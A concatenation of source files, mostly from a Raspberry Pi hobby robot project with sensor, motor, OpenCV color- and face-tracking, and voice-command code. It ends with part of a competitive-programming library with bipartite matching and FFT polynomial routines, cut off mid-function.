new Thread(this).start();
}
@Override
public void run (){
System.out.println("Process:running....");
while(running){
System.out.print("");
}
System.out.println("Process:EXIT");
}
public void Stop(){
running = false;
System.out.println("Process.Stop():running = " + running);
}
}
<file_sep>#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include "/usr/include/linux/i2c-dev.h"
#include "signal.h"
#include "move_api.h"
void quit_func();
int quit_flg = 0;
int range1 = 0;
int range2 = 0;
int main()
{
int fd1, fd2;
char filename[ 20 ];
char buf[ 10 ];
int res;
// I2Cデータバスをオープン
sprintf(filename, "/dev/i2c-1");
// 一つ目
fd1 = open(filename, O_RDWR);
if (fd1 < 0) {
printf("Error on open\n");
exit(1);
}
if (ioctl(fd1, I2C_SLAVE, (0xE2 >> 1) ) < 0) { // 0xE0(0x11100000) >> 1 = 0x70(0x01110000)
printf("Error on slave address 0xE2\n");
exit(1);
}
// 二つ目
fd2 = open(filename, O_RDWR);
if (fd2 < 0) {
printf("Error on open\n");
exit(1);
}
if (ioctl(fd2, I2C_SLAVE, (0xE6 >> 1) ) < 0) { // 0xE0(0x11100110) >> 1 = 0x73(0x01110011)
printf("Error on slave address 0xE6\n");
exit(1);
}
while (!quit_flg)
{
// 一つ目
// read from 0xE2
buf[ 0 ] = 0x00;
buf[ 1 ] = 0x51;
if ( (write(fd1, buf, 2) ) != 2) {
printf("0xE2 Error send the read command\n");
exit(1);
}
// Wait for the measurement
usleep(66000);
buf[ 0 ] = 0x02;
if ( (write(fd1, buf, 1) ) != 1) {
printf("0xE2 Error on select the Range High Byte\n");
exit(1);
}
if ( (read(fd1, buf, 1) ) != 1) {
printf("0xE2 Error on read the Range High Byte\n");
exit(1);
}
range1 = buf[ 0 ] << 8;
buf[ 0 ] = 0x03;
if ( (write(fd1, buf, 1) ) != 1) {
printf("0xE2 Error on select the Range Low Byte\n");
exit(1);
}
if ( (read(fd1, buf, 1) ) != 1) {
printf("0xE2 Error on read the Range Low Byte\n");
exit(1);
}
range1 |= buf[ 0 ];
// 二つ目
// read from 0xE2
buf[ 0 ] = 0x00;
buf[ 1 ] = 0x51;
if ( (write(fd2, buf, 2) ) != 2) {
printf("0xE6 Error send the read command\n");
exit(1);
}
// Wait for the measurement
usleep(66000);
buf[ 0 ] = 0x02;
if ( (write(fd2, buf, 1) ) != 1) {
printf("0xE6 Error on select the Range High Byte\n");
exit(1);
}
if ( (read(fd2, buf, 1) ) != 1) {
printf("0xE6 Error on read the Range High Byte\n");
exit(1);
}
range2 = buf[ 0 ] << 8;
buf[ 0 ] = 0x03;
if ( (write(fd2, buf, 1) ) != 1) {
printf("0xE6 Error on select the Range Low Byte\n");
exit(1);
}
if ( (read(fd2, buf, 1) ) != 1) {
printf("0xE6 Error on read the Range Low Byte\n");
exit(1);
}
range2 |= buf[ 0 ];
}
close(fd1);
close(fd2);
return 0;
}
int get_left()
{
return range1;
}
int get_right()
{
return range2;
}
void quit_func()
{
printf("quit\n");
quit_flg = 1;
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <wiringPi.h>
#include <unistd.h>
#define MOTOROUT1 14
#define MOTOROUT2 15
#define MOTORPWM 18
#define POW 1024
int main(void) {
int i = 0;
if ( wiringPiSetupGpio() == -1) {
printf("setup error");
return 1;
}
pinMode(MOTOROUT1, OUTPUT);
pinMode(MOTOROUT2, OUTPUT);
pinMode(MOTORPWM, PWM_OUTPUT);
digitalWrite(MOTOROUT1, 0);
digitalWrite(MOTOROUT2, 0);
digitalWrite(MOTORPWM, 0);
while(1) {
printf("forward\n");
digitalWrite(MOTOROUT1, 1);
pwmWrite(MOTORPWM, POW);
sleep(5);
pwmWrite(MOTORPWM, 0);
digitalWrite(MOTOROUT1, 0);
usleep(50000);
printf("back\n");
digitalWrite(MOTOROUT2, 1);
pwmWrite(MOTORPWM, POW);
sleep(5);
pwmWrite(MOTORPWM, 0);
digitalWrite(MOTOROUT2, 0);
printf("STOP\n");
sleep(5);
}
return 0;
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface ObjLib extends Library {
String path = "/home/pi/work/robot/RobotPrograms/libobj_cv.so";
ObjLib INSTANCE = (ObjLib) Native.loadLibrary(path, ObjLib.class);
// 基本的に正常:0 エラー:-1
int searchObj(char *obj);
int searchUser(int uid);
}
<file_sep>interface IApplication {
//アプリケーションの開始時に呼ばれる.この中でwhileループしたりすることは望ましくない.
void Start();
//アプリケーションの終了時に呼ばれる.
void Quit();
//アプリケーションが動作中に毎フレーム呼ばれる.
void Update();
//アプリケーションの終了時,Quitの前に呼ばれる.後始末などを書きたいときに.正常終了は0
int Cleanup();
//アプリケーションの動作中juliusからwordが入ってくる.
//wordはjulius側で定義する(ex.入力「こんにちは」word=hello)
void Order(String word);
//アプリケーション側はここをfalseにすると自発的に終われる
boolean IsRunning();
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#define SPI_CHANNEL 0
#define SS_PORT 8
#define MOTOR_OUT1 14
#define MOTOR_OUT2 15
#define SLEEP 100000
#define PR_LOW_CH 1
#define THRESHOLD_PR 1500
#define TERM_PR 10
int main(int argc, char **argv){
int a2dVal = 0, count = 0;
unsigned char data[3];
struct timeval start, end;
if (wiringPiSPISetup(SPI_CHANNEL, 1000000) < 0) {
printf("SPISetup failed:\n");
return 0;
}
if (wiringPiSetupGpio() == -1) {
printf("GPIO set up error\n");
return 0;
}
pinMode(SS_PORT, OUTPUT);
pinMode(MOTOR_OUT1, OUTPUT);
pinMode(MOTOR_OUT2, OUTPUT);
digitalWrite(SS_PORT, 1);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
digitalWrite(MOTOR_OUT2, 1);
gettimeofday(&start, NULL);
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 |(((PR_LOW_CH & 0x03) << 6));
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000; //first 4 bit
a2dVal |= (data[2] & 0xff);
if (a2dVal > THRESHOLD_PR) {
count++;
if (count > TERM_PR) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
gettimeofday(&end, NULL);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
int sec = end.tv_sec - start.tv_sec;
int time = sec * 1000000 + end.tv_usec;
time -= start.tv_usec;
printf("%d usec\n", time);
return time;
}
<file_sep>#include <opencv2/core.hpp>
#include <opencv2/videoio.hpp>
#include <opencv2/highgui.hpp>
#include <opencv2/video/tracking.hpp>
#include <opencv2/imgproc.hpp>
#include <opencv2/face.hpp>
#include <opencv2/objdetect.hpp>
#include <iostream>
#include <fstream>
#include <sstream>
#include <vector>
#include <string.h>
#include "move_api.h"
#define CAMERA_U_IDX 0
#define CAMERA_F_IDX 0
#define NFC 3 //NotFoundCount Threshold
#define FC 3 //FoundCount Threshold
#define TURN_S 500
#define STRAIGHT_S 500
#define STRAIGHT_SLOW 200
using namespace cv;
using namespace cv::face;
using namespace std;
int AREA_TS = 307200 * 0.8;
int AREA_SLOW = 307200 * 0.6;
string fn_haar = "/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml";
string fn_csv = "/home/pi/work/robot/RobotPrograms/resources/face.csv";
extern "C" void read_csv(const string& filename, vector<Mat>& images, vector<int>& labels, char separator = ';') {
std::ifstream file(filename.c_str(), ifstream::in);
if (!file) {
string error_message = "No valid input file was given, please check the given filename.";
CV_Error(CV_StsBadArg, error_message);
return;
}
string line, path, classlabel;
while (getline(file, line)) {
stringstream liness(line);
getline(liness, path, separator);
getline(liness, classlabel);
if(!path.empty() && !classlabel.empty()) {
images.push_back(imread(path, 0));
labels.push_back(atoi(classlabel.c_str()));
}
}
}
extern "C" int searchObj(char* color) {
cv::Scalar max;
cv::Scalar min;
if (strcmp(color, "Yellow") == 0) {
min = cv::Scalar(40, 100, 160);
max = cv::Scalar(70, 255, 255);
} else if (strcmp(color, "Blue") == 0) {
min = cv::Scalar(100, 150, 50);
max = cv::Scalar(170, 255, 255);
} else if (strcmp(color, "Red") == 0) {
min = cv::Scalar(0, 150, 150);
max = cv::Scalar(40, 255, 255);
} else {
return -1;
}
g_init();
/* // >>>> Kalman Filter
int stateSize = 6;
int measSize = 4;
int contrSize = 0;
unsigned int type = CV_32F;
cv::KalmanFilter kf(stateSize, measSize, contrSize);
cv::Mat state(stateSize, 1, type); // [x,y,v_x,v_y,w,h]
cv::Mat meas(measSize, 1, type); // [z_x,z_y,z_w,z_h]
//cv::Mat procNoise(stateSize, 1, type)
// [E_x,E_y,E_v_x,E_v_y,E_w,E_h]
// Transition State Matrix A
// Note: set dT at each processing step!
// [ 1 0 dT 0 0 0 ]
// [ 0 1 0 dT 0 0 ]
// [ 0 0 1 0 0 0 ]
// [ 0 0 0 1 0 0 ]
// [ 0 0 0 0 1 0 ]
// [ 0 0 0 0 0 1 ]
cv::setIdentity(kf.transitionMatrix);
// Measure Matrix H
// [ 1 0 0 0 0 0 ]
// [ 0 1 0 0 0 0 ]
// [ 0 0 0 0 1 0 ]
// [ 0 0 0 0 0 1 ]
kf.measurementMatrix = cv::Mat::zeros(measSize, stateSize, type);
kf.measurementMatrix.at<float>(0) = 1.0f;
kf.measurementMatrix.at<float>(7) = 1.0f;
kf.measurementMatrix.at<float>(16) = 1.0f;
kf.measurementMatrix.at<float>(23) = 1.0f;
// Process Noise Covariance Matrix Q
// [ Ex 0 0 0 0 0 ]
// [ 0 Ey 0 0 0 0 ]
// [ 0 0 Ev_x 0 0 0 ]
// [ 0 0 0 Ev_y 0 0 ]
// [ 0 0 0 0 Ew 0 ]
// [ 0 0 0 0 0 Eh ]
//cv::setIdentity(kf.processNoiseCov, cv::Scalar(1e-2));
kf.processNoiseCov.at<float>(0) = 1e-2;
kf.processNoiseCov.at<float>(7) = 1e-2;
kf.processNoiseCov.at<float>(14) = 5.0f;
kf.processNoiseCov.at<float>(21) = 5.0f;
kf.processNoiseCov.at<float>(28) = 1e-2;
kf.processNoiseCov.at<float>(35) = 1e-2;
// Measures Noise Covariance Matrix R
cv::setIdentity(kf.measurementNoiseCov, cv::Scalar(1e-1));
// <<<< Kalman Filter
*/
cv::VideoCapture cap(CAMERA_F_IDX);//デバイスのオープン
if(!cap.isOpened()){ //読み込みに失敗したときの処理
return -1;
}
cv::Mat frame;
cv::Mat res;
cv::Rect bBoxmax;
double ticks = 0;
bool found = false;
int notFoundCount = 0;
// g_init();
while(1) {
cap >> frame;
frame.copyTo(res);
double precTick = ticks;
ticks = (double)cv::getTickCount();
double dT = (ticks - precTick) / cv::getTickFrequency(); //seconds
/*
if (found) {
// >>>> Matrix A
kf.transitionMatrix.at<float>(2) = dT;
kf.transitionMatrix.at<float>(9) = dT;
// <<<< Matrix A
//cout << "dT:" << endl << dT << endl;
state = kf.predict();
//cout << "State post:" << endl << state << endl;
cv::Rect predRect;
predRect.width = state.at<float>(4);
predRect.height = state.at<float>(5);
predRect.x = state.at<float>(0) - predRect.width / 2;
predRect.y = state.at<float>(1) - predRect.height / 2;
cv::Point center;
center.x = state.at<float>(0);
center.y = state.at<float>(1);
// cv::circle(res, center, 2, CV_RGB(255, 0, 0), -1);
// cv::rectangle(res, predRect, CV_RGB(255, 0, 0), 2);
}
*/
// >>>>> Noise smoothing
cv::Mat blur;
cv::GaussianBlur(frame, blur, cv::Size(5, 5), 3.0, 3.0);
// <<<<< Noise smoothing
// >>>>> HSV conversion
cv::Mat frmHsv;
cv::cvtColor(blur, frmHsv, CV_BGR2HSV);
// <<<<< HSV conversion
// >>>>> Color Thresholding
cv::Mat rangeRes = cv::Mat::zeros(frame.size(), CV_8UC1);
cv::inRange(frmHsv, cv::Scalar(100, 150, 50),cv::Scalar(170, 255, 255), rangeRes);
// <<<<< Color Thresholding
// >>>>> Improving the result
cv::erode(rangeRes, rangeRes, cv::Mat(), cv::Point(-1, -1), 2);
cv::dilate(rangeRes, rangeRes, cv::Mat(), cv::Point(-1, -1), 2);
// <<<<< Improving the result
std::vector<std::vector<cv::Point> > contours;
cv::findContours(rangeRes, contours, CV_RETR_EXTERNAL, CV_CHAIN_APPROX_NONE);
cv::Rect bBox;
std::vector<cv::Point> max;
std::vector<std::vector<cv::Point> > resultbox;
if (contours.size() == 0) {
sleep(1);
g_turn(0, TURN_S);
cout << "Not found" << endl;
} else {
max = contours[0];
bBoxmax = cv::boundingRect(max);
bBox = bBoxmax;
for (size_t i = 0; i < contours.size(); i++) {
bBox = cv::boundingRect(contours[i]);
if (bBox.area() > bBoxmax.area()){
bBoxmax = bBox;
max = contours[i];
}
}
int X, Y;
X = bBoxmax.x + bBoxmax.width / 2;
Y = bBoxmax.y + bBoxmax.height / 2;
if (X > 0 && X < 260) {
sleep(1);
g_turn(1,TURN_S);
cout << "turn left" << endl;
} else if (X >340 && X < 640) {
sleep(1);
g_turn(0, TURN_S);
cout << "turn right" << endl;
} else if (Y <= 440) {
sleep(1);
g_go_straight(1, TURN_S);
cout << "go straight" << endl;
} else if (Y > 440 && X <= 340 && X >= 260){
time_t t = time(NULL);
cout << "almost there.." << endl;
while (time(NULL) - t <= 1) {
g_go_straight(1,STRAIGHT_S);
}
g_stop();
g_quit();
return 0;
}
}
/* // >>>>> Kalman Update
if (resultbox.size() == 0) {
// X = 1300;
// Y = 800;
notFoundCount++;
if (notFoundCount >= 100) {
found = false;
}
} else {
notFoundCount = 0;
meas.at<float>(0) = bBoxmax.x + bBoxmax.width / 2;
meas.at<float>(1) = bBoxmax.y + bBoxmax.height / 2;
meas.at<float>(2) = (float)bBoxmax.width;
meas.at<float>(3) = (float)bBoxmax.height;
if (!found) // First detection!
{
// >>>> Initialization
kf.errorCovPre.at<float>(0) = 1; // px
kf.errorCovPre.at<float>(7) = 1; // px
kf.errorCovPre.at<float>(14) = 1;
kf.errorCovPre.at<float>(21) = 1;
kf.errorCovPre.at<float>(28) = 1; // px
kf.errorCovPre.at<float>(35) = 1; // px
state.at<float>(0) = meas.at<float>(0);
state.at<float>(1) = meas.at<float>(1);
state.at<float>(2) = 0;
state.at<float>(3) = 0;
state.at<float>(4) = meas.at<float>(2);
state.at<float>(5) = meas.at<float>(3);
// <<<< Initialization
found = true;
} else {
kf.correct(meas); // Kalman Correction
}
}
*/
// cv::imshow("Threshold", res);
}
g_quit();
return 0;
}
extern "C" int searchUser(int uid) {
vector<Mat> images;
vector<int> labels;
try {
read_csv(fn_csv, images, labels);
} catch (cv::Exception& e) {
cerr << "Error opening file \"" << fn_csv << "\". Reason: " << e.msg << endl;
return -1;
}
g_init();
int im_width = images[0].cols;
int im_height = images[0].rows;
Ptr<FaceRecognizer> model = createFisherFaceRecognizer();
model->train(images, labels);
CascadeClassifier haar_cascade;
haar_cascade.load(fn_haar);
VideoCapture cap(CAMERA_U_IDX);
if(!cap.isOpened()) {
cerr << "Capture Device cannot be opened." << endl;
return -1;
}
int notFoundCount = 0, FoundCount = 0;
Mat frame;
for(;;) {
cap >> frame;
Mat original = frame.clone();
Mat gray;
cvtColor(original, gray, CV_BGR2GRAY);
vector< Rect_<int> > faces;
haar_cascade.detectMultiScale(gray, faces);
Rect max = faces[0];
for(int i = 0; i < faces.size(); i++) {
if (faces[i].area() < max.area()) {
continue;
}
max = faces[i];
}
Rect face_i = max;
Mat face = gray(face_i);
Mat face_resized;
cv::resize(face, face_resized, Size(im_width, im_height), 1.0, 1.0, INTER_CUBIC);
int prediction = model->predict(face_resized);
if (prediction != uid) {
notFoundCount++;
} else {
FoundCount++;
}
if (notFoundCount > NFC) {
notFoundCount = 0;
FoundCount = 0;
g_turn(1, TURN_S);
} else if (FoundCount > FC) {
notFoundCount = 0;
FoundCount = 0;
int X, Y, area;
X = face_i.x + face_i.width / 2;
Y = face_i.y + face_i.height / 2;
area = face_i.width * face_i.height;
if (area > AREA_TS) {
g_stop();
g_quit();
return 0;
} else if (X > 0 && X < 260) {
sleep(1);
g_turn(1,TURN_S);
cout << "turn left" << endl;
} else if (X >340 && X < 640) {
sleep(1);
g_turn(0, TURN_S);
cout << "turn right" << endl;
} else if (X <= 340 && X >= 260){
sleep(1);
if (area > AREA_SLOW) {
g_go_straight(1, STRAIGHT_SLOW);
} else {
g_go_straight(1, STRAIGHT_S);
}
}
} else {
}
usleep(20000);
}
return -1;
}
int main(int argh, char* argv[]) {
int test = atoi(argv[1]);
if (test == 1) { //User
searchUser(atoi(argv[2]));
} else if (test == 2) { //Object
searchObj(argv[2]);
}
return 0;
}
<file_sep>#include <opencv2/core/core.hpp>
#include <opencv2/highgui/highgui.hpp>
#include <opencv2/imgproc/imgproc.hpp>
#include "stdio.h"
using namespace cv;
unsigned char max_intensity = 0;
int target_x = 0;
int target_y = 0;
int window_x_center = 0;
int window_y_max = 0;
int quit_brightness = 0;
Mat brightness;
VideoCapture capture;
extern "C" int start_brightness()
{
VideoCapture cap(0); // デフォルトカメラをオープン
capture = cap;
if(!cap.isOpened()) // 成功したかどうかをチェック
return -1;
namedWindow("brightness",1);
// VideoCapture デストラクタにより,カメラは自動的に終了処理されます
return 0;
}
extern "C" void update_brightness(){
Mat frame;
capture >> frame; // カメラから新しいフレームを取得
cv::cvtColor(frame, brightness, CV_BGR2GRAY);
window_x_center = brightness.cols/2;
window_y_max = brightness.rows;
unsigned char intensity = 0;
max_intensity = 0;
for( int y = 0; y < brightness.rows; y++ ) {
for( int x = 0; x < brightness.cols; x++ ) {
intensity = brightness.at<unsigned char>(y, x); //X座標がx, Y座標がyに位置するピクセルの値を取得
if(intensity <= max_intensity){continue;}
// intensity is more than max_intensity
max_intensity = intensity;
target_x = x;
target_y = y;
}
}
//printf("max is %d at %d,%d\n", max_intensity,target_x,target_y);
// 直線の描画(画像,始点,終点,色,線幅、連結する近傍数)
line(brightness, Point(window_x_center, window_y_max), Point(target_x, target_y), Scalar(0,0,250), 3, 4);
imshow("brightness", brightness);
waitKey(30);
}
extern "C" int get_vec_x(){
return target_x - window_x_center;
}
extern "C" int get_vec_y(){
// 座標系の関係で順番が逆
return window_y_max - target_y;
}
int main(){
start_brightness();
while(1){
update_brightness();
}
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface ArmLib extends Library {
String path = "/home/pi/work/robot/RobotPrograms/libarm_api.so";
ArmLib INSTANCE = (ArmLib) Native.loadLibrary(path, ArmLib.class);
// 基本的に正常:0 エラー:-1
int init();
int arm_open();
int arm_close();
int arm_fclose();
int raise();
int lower();
int lower_t(int clock);
void stop();
void quit();
}
<file_sep>#include <stdio.h>
#include <string.h>
/* wavファイルヘッダー解析プログラム */
/* gcc -o wav wav.c */
/* ./wav sample.wav */
typedef struct{
char riff[4]; // RIFFヘッダ
unsigned int fileSize; // ファイルサイズ - 8
char wave[4]; // WAVEヘッダ
} wavHeader;
typedef struct{
unsigned char fmt[4]; // fmt チャンク
int fmtSize; // fmt チャンクのバイト数
} tagChank;
typedef struct{
unsigned short id; // フォーマットID
unsigned short channels; // チャンネル数
unsigned int samplingRate; // サンプリングレート
unsigned int bytesPerSec; // データ速度 (Byte/sec)
unsigned short blockSize; // ブロックサイズ
unsigned short bitsPerSample; // サンプルあたりのビット数
} wavFormat;
int main(int argc,char *argv[]){
FILE *fp;
int i;
wavHeader header;
tagChank chank;
wavFormat format;
fp=fopen(argv[1],"rb");
/*ヘッダー情報の読み取り*/
fread(&header,sizeof(wavHeader),1,fp);
header.riff[4]='\0';
header.wave[4]='\0';
printf("識別子 : %s\n",header.riff);
printf("ファイルサイズ : %d[bytes]\n",header.fileSize+8);
printf("ファイル形式 : %s\n",header.wave);
/*チャンクの読み取り*/
fread(&chank,sizeof(chank),1,fp);
long len =chank.fmtSize;
chank.fmt[4]='\0';
printf("fmt : %s\n",chank.fmt);
printf("fmtチャンクサイズ : %ld[bytes]\n",len);
/*各種フォーマットデータの読み取り*/
fread(&format,sizeof(wavFormat),1,fp);
printf("format ID(PCM=1) : %d (0x%04x)\n",format.id,format.id);
printf("チャンネル数 : %d (モノラル=1 ステレオ=2)\n",format.channels);
printf("サンプリングレート : %d[Hz]\n",format.samplingRate);
printf("データ速度 : %d[bytes/sec]\n",format.bytesPerSec);
printf("ブロックサイズ : %d[bytes]\n",format.blockSize);
printf("量子化ビット数 : %d[bit]\n",format.bitsPerSample);
printf("再生時間 : %.2f[sec]\n",(double)(header.fileSize+8)/format.bytesPerSec);
fclose(fp);
}
<file_sep>import java.util.Scanner;
public class ShooterLibTester {
public static void main(String[] args) {
System.out.println("GUN GUN Shoot!");
ShooterLib shooter = ShooterLib.INSTANCE;
shooter.start_moter();
while (true) {
System.out.println("殺戮をやめるには1を");
Scanner scan = new Scanner(System.in);
String str = scan.next();
if (str.equals("1")) {
shooter.stop_moter();
break;
}
}
}
}
<file_sep>class BrightnessApp implements IApplication {
static final int threshold = 10;
private boolean quit = false;
public void Start(){
Robot.Init();
System.out.println("Brightness Ready !");
AudioLib.INSTANCE.play("Brightness.wav");
BrightnessLib.INSTANCE.start_brightness();
}
public void Quit(){
AudioLib.INSTANCE.play("EndBrightness.wav");
Robot.Stop();
Robot.Quit();
}
public void Update(){
BrightnessLib.INSTANCE.update_brightness();
int x = BrightnessLib.INSTANCE.get_vec_x();
int y = BrightnessLib.INSTANCE.get_vec_y();
if(x > threshold){
Robot.Turn(LR.Right, x);
}else if(x < -threshold){
Robot.Turn(LR.Left, -x);
}else if(y < threshold){
}else{
Robot.Move(FB.Front, y);
}
}
public int Cleanup(){
System.out.println("Cleanup Robot...");
return 0;
}
public void Order(String word){
}
public boolean IsRunning(){
return !quit;
}
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#define SPI_CHANNEL 0
#define SS_PORT 8
#define THRESHOLD 1500
#define TERM 3
#define SLEEP 100000
int main(int argc, char **argv){
int retCode;
int a2dChannel = 1; // analog channel
int a2dVal = 0;
unsigned char data[3];
if (wiringPiSPISetup(SPI_CHANNEL, 1000000) < 0)
{
printf("SPISetup failed:\n");
return 0;
}
if (wiringPiSetupGpio() == -1) {
printf("GPIO set up error\n");
return 0;
}
pinMode(SS_PORT, OUTPUT);
digitalWrite(SS_PORT, 1);
int count = 0;
while(1) {
data[0] = 0b00000110; // first byte transmitted -> start bit -> (SGL/DIF = 1,D2=0)
data[1] = 0b01000000; // second byte transmitted -> (D1=D0=0)
data[2] = 0; // third byte transmitted....don't care
digitalWrite(SS_PORT, 0);
retCode=wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000; //first 4 bit
a2dVal |= (data[2] & 0xff);
printf("a2dVal=%d\n",a2dVal);
if (a2dVal > THRESHOLD) {
count++;
if (count > TERM) {
printf("Reach the top.\n");
break;
}
} else {
count = 0;
}
usleep(SLEEP);
}
}
<file_sep>#include <stdio.h>
#include <wiringPi.h>
int main(){
if (wiringPiSetupGpio() == -1) {
fprintf(stderr, "WiringPi Initialize Error\n");
return 0;
}
pinMode(18,PWM_OUTPUT);
pwmSetMode(PWM_MODE_MS);
pwmSetClock(375);
pwmSetRange(1024);
while(1){
int num;
int duty = 75;
scanf("%i",&num);
printf("%d\n",num);
pwmWrite(18,num);
}
return 0;
}
<file_sep>class RobotMoveApp implements IApplication {
public void Start(){
Robot.Init();
System.out.println("Robot Ready !");
AudioLib.INSTANCE.play("TestMove.wav");
}
public void Quit(){
AudioLib.INSTANCE.play("EndTestMove.wav");
Robot.Stop();
Robot.Quit();
}
public void Update(){
}
public int Cleanup(){
System.out.println("Cleanup Robot...");
return 0;
}
public void Order(String word){
if(word.equals("front"))Robot.Move(FB.Front, 300);
if(word.equals("back"))Robot.Move(FB.Back, 300);
if(word.equals("left"))Robot.Turn(LR.Left, 300);
if(word.equals("right"))Robot.Turn(LR.Right, 300);
}
public boolean IsRunning(){
return true;
}
}
|
8cc4233b3511648867d315f02097fe430afa63c1
|
[
"Java",
"C",
"C++"
] | 48
|
C
|
urotanke95/RobotPrograms
|
f0f45f0072e801350e17f8ec60b5db3443928c4f
|
e2316771c0cb823eb88aad2cea94f7e183c2a838
|
refs/heads/master
|
<file_sep># code-library
[](https://travis-ci.com/nju-calabash/code-library)
[](https://codecov.io/gh/nju-calabash/code-library)
Standard Code Library for Competitive Programming Contests like ICPC
<file_sep>#include <bits/stdc++.h>
#define MAXN 5030
using namespace std;
#define Rep(i, n) for (int i = 1; i <= int(n); i++)
/*
%%%
title: Bipartite Matching
desc:
Maximum matching, minimum vertex cover and maximum independent set for
bipartite graph. All indices are 1-based. \par
Set \lstinline|n1, n2| and \lstinline|adj[i]|, then call \lstinline|matching()| to get the size of the maximum matching.
usage:
n1, n2: the size of left part and right part.
adj[i]: the neighborhood of left vertex $i$.
dx[i], dy[i]: the right/left matched index of left/right vertex $i$, or 0 if the vertex is not matched.
%%%
*/
// +++
int n1, n2;
vector<int> adj[MAXN];
int mx[MAXN], my[MAXN];
int dx[MAXN], dy[MAXN];
bool vis[MAXN];
bool vx[MAXN], vy[MAXN];
void mark(int u) {
if (vx[u]) return;
vx[u] = true;
for (int v : adj[u]) if (v != mx[u]) {
vy[v] = true;
mark(my[v]);
}
}
bool find(int u) {
for (int v : adj[u]) {
if (!vis[v] && dy[v] == dx[u] + 1) {
vis[v] = true;
if (!my[v] or find(my[v])) {
mx[u] = v;
my[v] = u;
return true;
}
}
}
return false;
}
int matching() {
queue<int> q;
memset(mx, 0, sizeof(mx));
memset(my, 0, sizeof(my));
int ans = 0;
while (true) {
bool flag = false;
while (q.size()) q.pop();
memset(dx, 0, sizeof(dx));
memset(dy, 0, sizeof(dy));
Rep (i, n1) if (!mx[i]) q.push(i);
while (q.size()) {
int u = q.front(); q.pop();
for (int v : adj[u]) if (!dy[v]) {
dy[v] = dx[u] + 1;
if (my[v]) {
dx[my[v]] = dy[v] + 1;
q.push(my[v]);
} else flag = true;
}
}
if (!flag) break;
memset(vis, 0, sizeof(vis));
Rep (i, n1) if (!mx[i] && find(i)) ans++;
}
return ans;
}
//+++
int main() {
n1 = 3, n2 = 2;
adj[1] = {1, 2};
adj[2] = {2};
assert(matching() == 2);
}
<file_sep>#include <bits/stdc++.h>
using namespace std;
#define rep(i, n) for (int i = 0; i < int(n); i++)
#define Rep(i, n) for (int i = 1; i <=int(n); i++)
#define range(x) begin(x), end(x)
typedef long long LL;
/*
%%%
title: Fast Polynomial Operations
desc: \lstinline|inverse|, \lstinline|log|, \lstinline|exp| are modulo $x^n$. \lstinline|operator *|, \lstinline|div| do not.
%%%
*/
extern const int mod;
LL powmod(LL b, LL e) {
LL r = 1;
while (e) {
if (e & 1) r = r * b % mod;
b = b * b % mod;
e >>= 1;
}
return r;
}
void printvec(const vector<int>& a) {
printf("[");
rep (i, a.size()) {
if (i) printf(", ");
printf("%d", a[i]);
}
printf("]\n");
}
// +++
#pragma GCC optimize("fast-math")
const int mod = 998244353;
namespace poly {
typedef complex<double> num;
int base = 1;
vector<num> roots = {0, 1};
vector<int> rev = {0, 1};
void ensure_base(int nbase) {
if (nbase <= base) return;
rev.resize(1<<nbase);
rep (i, 1<<nbase) rev[i] = (rev[i>>1]>>1)|((i&1)<<(nbase-1));
roots.resize(1<<nbase);
while (base < nbase) {
double angle = 2 * acos(-1) / (1 << (base + 1));
for (int i = 1 << (base - 1); i < (1 << base); i++) {
roots[i<<1] = roots[i];
roots[i<<1|1] = polar(1.0, angle*(2*i+1-(1<<base)));
}
base++;
}
}
void fft(vector<num> &a, int n = -1) {
if (n < 0) n = a.size();
assert((n & (n - 1)) == 0);
int zeros = __builtin_ctz(n), sh = base - zeros;
ensure_base(zeros);
rep (i, n) if (i < (rev[i]>>sh)) swap(a[i], a[rev[i]>>sh]);
for (int k = 1; k < n; k <<= 1) {
for (int i = 0; i < n; i += 2*k) {
for (int j = 0; j < k; j++) {
num z = a[i+j+k] * roots[j+k];
a[i+j+k] = a[i+j]-z;
a[i+j] += z;
}
}
}
}
vector<int> multiply(const vector<int>& a, const vector<int>& b) {
int sz = a.size() + b.size() - 1;
vector<int> ret(sz);
int nbase = 0;
while ((1 << nbase) < sz) nbase++;
ensure_base(nbase);
sz = 1 << nbase;
vector<num> fa(sz);
rep (i, a.size()) fa[i].real(a[i]);
rep (i, b.size()) fa[i].imag(b[i]);
fft(fa);
num r(0, -0.25 / sz);
for (int i = 0; i <= (sz >> 1); i++) {
int j = (sz - i) & (sz - 1);
num z = (fa[j] * fa[j] - conj(fa[i] * fa[i])) * r;
if (i != j) fa[j] = (fa[i] * fa[i] - conj(fa[j] * fa[j])) * r;
fa[i] = z;
}
fft(fa);
rep (i, ret.size()) ret[i] = llround(real(fa[i]));
return ret;
}
vector<int> operator * (const vector<int>& a, const vector<int>& b) {
int sz = a.size() + b.size() - 1;
vector<int> res(sz);
int nbase = 0;
while ((1 << nbase) < sz) nbase++;
ensure_base(nbase);
sz = 1 << nbase;
vector<num> fa(sz), fb(sz);
rep (i, a.size()) {
int x = (a[i] % mod + mod) % mod;
fa[i] = num(x & ((1<<15)-1), x >> 15);
}
fft(fa);
rep (i, b.size()) {
int x = (b[i] % mod + mod) % mod;
fb[i] = num(x & ((1<<15)-1), x >> 15);
}
fft(fb);
double ratio = 0.25 / sz;
for (int i = 0; i <= (sz >> 1); i++) {
int j = (sz - i) & (sz - 1);
num ra[2], rb[2];
rep (s, 2) {
num a1 = (fa[i] + conj(fa[j])),
a2 = (fa[i] - conj(fa[j])) * num(0, -1),
b1 = (fb[i] + conj(fb[j])) * ratio,
